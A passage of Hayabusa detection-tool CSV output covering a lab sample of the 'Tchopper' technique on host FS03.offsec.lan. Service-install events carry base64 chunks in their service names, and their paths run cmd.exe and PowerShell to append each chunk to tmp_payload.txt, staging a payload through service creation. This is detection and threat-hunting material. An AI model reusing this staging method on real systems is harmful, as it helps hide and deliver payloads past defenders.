NlY3VyaXR5IDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlNlY3VyaXR5Rmlyc3RFdmVudFRpbWU7ICJTZWN1cml0eSBsYXN0IEV2ZW50IiA9ICRib3guVmFsdWUuU2VjdXJpdHlMYXN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:55.903 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: OyAiU2VjdXJpdHkgdG90YWwgZXZlbnRzIiA9ICRib3guVmFsdWUuU2VjdXJpdHlUb3RhbEV2ZW50czsgIlNlY3VyaXR5IExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TZWN1cml0eUV2ZW50TG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:55.903 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: OyAiU2VjdXJpdHkgdG90YWwgZXZlbnRzIiA9ICRib3guVmFsdWUuU2VjdXJpdHlUb3RhbEV2ZW50czsgIlNlY3VyaXR5IExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TZWN1cml0eUV2ZW50TG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:55.903 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: OyAiU2VjdXJpdHkgdG90YWwgZXZlbnRzIiA9ICRib3guVmFsdWUuU2VjdXJpdHlUb3RhbEV2ZW50czsgIlNlY3VyaXR5IExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TZWN1cml0eUV2ZW50TG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:57.355 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 9nU2l6ZTsgDQogICAgICAgICAgICAiU3lzdGVtIChFUFMpIiA9ICRib3guVmFsdWUuU3lzdGVtRVBTOyAiU3lzdGVtIDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlN5c3RlbUZpcnN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:57.355 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9nU2l6ZTsgDQogICAgICAgICAgICAiU3lzdGVtIChFUFMpIiA9ICRib3guVmFsdWUuU3lzdGVtRVBTOyAiU3lzdGVtIDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlN5c3RlbUZpcnN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:57.355 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9nU2l6ZTsgDQogICAgICAgICAgICAiU3lzdGVtIChFUFMpIiA9ICRib3guVmFsdWUuU3lzdGVtRVBTOyAiU3lzdGVtIDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlN5c3RlbUZpcnN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:58.798 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: OyAiU3lzdGVtIGxhc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5TeXN0ZW1MYXN0RXZlbnRUaW1lOyAiU3lzdGVtIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLlN5c3RlbVRvdGFsRXZlbnRzOyAiU3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:58.798 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: OyAiU3lzdGVtIGxhc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5TeXN0ZW1MYXN0RXZlbnRUaW1lOyAiU3lzdGVtIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLlN5c3RlbVRvdGFsRXZlbnRzOyAiU3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:58.798 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: OyAiU3lzdGVtIGxhc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5TeXN0ZW1MYXN0RXZlbnRUaW1lOyAiU3lzdGVtIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLlN5c3RlbVRvdGFsRXZlbnRzOyAiU3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:00.236 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: lzdGVtIExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TeXN0ZW1FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiVG90YWwgKEVQUykiID0gJGJveC5WYWx1ZS5Ub3RhbEVQUzsgIlByb2ZpbGUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:00.236 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: lzdGVtIExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TeXN0ZW1FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiVG90YWwgKEVQUykiID0gJGJveC5WYWx1ZS5Ub3RhbEVQUzsgIlByb2ZpbGUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:00.236 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: lzdGVtIExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TeXN0ZW1FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiVG90YWwgKEVQUykiID0gJGJveC5WYWx1ZS5Ub3RhbEVQUzsgIlByb2ZpbGUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:01.719 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: U3VnZ2VzdGlvbiAoMyBTZWMgUG9sbGluZyBJbnRlcnZhbCkiID0gJGJveC5WYWx1ZS5Qcm9maWxlU3VnZ2VzdGlvbjt9KQ0KDQogICAgICAgIH0NCg0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5QVV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:01.719 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: U3VnZ2VzdGlvbiAoMyBTZWMgUG9sbGluZyBJbnRlcnZhbCkiID0gJGJveC5WYWx1ZS5Qcm9maWxlU3VnZ2VzdGlvbjt9KQ0KDQogICAgICAgIH0NCg0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5QVV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:01.719 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: U3VnZ2VzdGlvbiAoMyBTZWMgUG9sbGluZyBJbnRlcnZhbCkiID0gJGJveC5WYWx1ZS5Qcm9maWxlU3VnZ2VzdGlvbjt9KQ0KDQogICAgICAgIH0NCg0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5QVV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:03.160 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RfTE9HICJTZWxlY3QgRXZlbnQgTG9nIEV4cG9ydCBMb2NhdGlvbi4uLiINCg0KICAgICAgICAkRXhwb3J0Rm9sZGVyID0gU2VsZWN0LUV4cG9ydExvY2F0aW9uICJFdmVudCBMb2cgU3VtbWFyeSBS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:03.160 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RfTE9HICJTZWxlY3QgRXZlbnQgTG9nIEV4cG9ydCBMb2NhdGlvbi4uLiINCg0KICAgICAgICAkRXhwb3J0Rm9sZGVyID0gU2VsZWN0LUV4cG9ydExvY2F0aW9uICJFdmVudCBMb2cgU3VtbWFyeSBS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:03.160 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RfTE9HICJTZWxlY3QgRXZlbnQgTG9nIEV4cG9ydCBMb2NhdGlvbi4uLiINCg0KICAgICAgICAkRXhwb3J0Rm9sZGVyID0gU2VsZWN0LUV4cG9ydExvY2F0aW9uICJFdmVudCBMb2cgU3VtbWFyeSBS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:04.601 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZXBvcnQgRXhwb3J0IExvY2F0aW9uIiAiRGVza3RvcCINCiAgICAgICAgDQogICAgICAgICRFeHBvcnRMb2NhdGlvbiA9ICRFeHBvcnRGb2xkZXIgKyAiXEV2ZW50LUxvZy1TdW1tYXJ5LVJlcG9ydC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:04.601 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZXBvcnQgRXhwb3J0IExvY2F0aW9uIiAiRGVza3RvcCINCiAgICAgICAgDQogICAgICAgICRFeHBvcnRMb2NhdGlvbiA9ICRFeHBvcnRGb2xkZXIgKyAiXEV2ZW50LUxvZy1TdW1tYXJ5LVJlcG9ydC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:04.601 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZXBvcnQgRXhwb3J0IExvY2F0aW9uIiAiRGVza3RvcCINCiAgICAgICAgDQogICAgICAgICRFeHBvcnRMb2NhdGlvbiA9ICRFeHBvcnRGb2xkZXIgKyAiXEV2ZW50LUxvZy1TdW1tYXJ5LVJlcG9ydC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:06.043 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0iICsgJChnZXQtZGF0ZSAtZiB5eXl5TU1kZGhobW1zcykgKyAiLmNzdiIgICAgICAgICAgICANCiAgICAgICAgICAgICAgICANCiAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiRXhwb3J0aW5n | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:06.043 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0iICsgJChnZXQtZGF0ZSAtZiB5eXl5TU1kZGhobW1zcykgKyAiLmNzdiIgICAgICAgICAgICANCiAgICAgICAgICAgICAgICANCiAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiRXhwb3J0aW5n | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:06.043 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0iICsgJChnZXQtZGF0ZSAtZiB5eXl5TU1kZGhobW1zcykgKyAiLmNzdiIgICAgICAgICAgICANCiAgICAgICAgICAgICAgICANCiAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiRXhwb3J0aW5n | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:07.496 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IExvZyBFdmVudHMgdG86ICRFeHBvcnRMb2NhdGlvbiINCg0KICAgICAgICAkT3V0cHV0VGFibGUgfCBFeHBvcnQtQ1NWICRFeHBvcnRMb2NhdGlvbiAtTm9UeXBlSW5mb3JtYXRpb24gLUZvcmNlDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:07.496 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IExvZyBFdmVudHMgdG86ICRFeHBvcnRMb2NhdGlvbiINCg0KICAgICAgICAkT3V0cHV0VGFibGUgfCBFeHBvcnQtQ1NWICRFeHBvcnRMb2NhdGlvbiAtTm9UeXBlSW5mb3JtYXRpb24gLUZvcmNlDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:07.496 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IExvZyBFdmVudHMgdG86ICRFeHBvcnRMb2NhdGlvbiINCg0KICAgICAgICAkT3V0cHV0VGFibGUgfCBFeHBvcnQtQ1NWICRFeHBvcnRMb2NhdGlvbiAtTm9UeXBlSW5mb3JtYXRpb24gLUZvcmNlDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:08.937 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gRXhwb3J0IExvZyBSZXBvcnQiDQoNCiAgICAgICAgV3JpdGUtTG9nICRF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:08.937 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gRXhwb3J0IExvZyBSZXBvcnQiDQoNCiAgICAgICAgV3JpdGUtTG9nICRF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:08.937 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gRXhwb3J0IExvZyBSZXBvcnQiDQoNCiAgICAgICAgV3JpdGUtTG9nICRF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:10.406 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: UlJPUl9MT0cgJEVycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:10.406 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: UlJPUl9MT0cgJEVycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:10.406 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UlJPUl9MT0cgJEVycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:11.900 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RFUlJPUl9MT0cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQogICAgfQ0KfQ0KDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:11.900 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RFUlJPUl9MT0cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQogICAgfQ0KfQ0KDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:11.900 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RFUlJPUl9MT0cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQogICAgfQ0KfQ0KDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:13.355 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdlbmVyYXRlIGEgRm9sZGVyIFNlbGVjdCBEaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 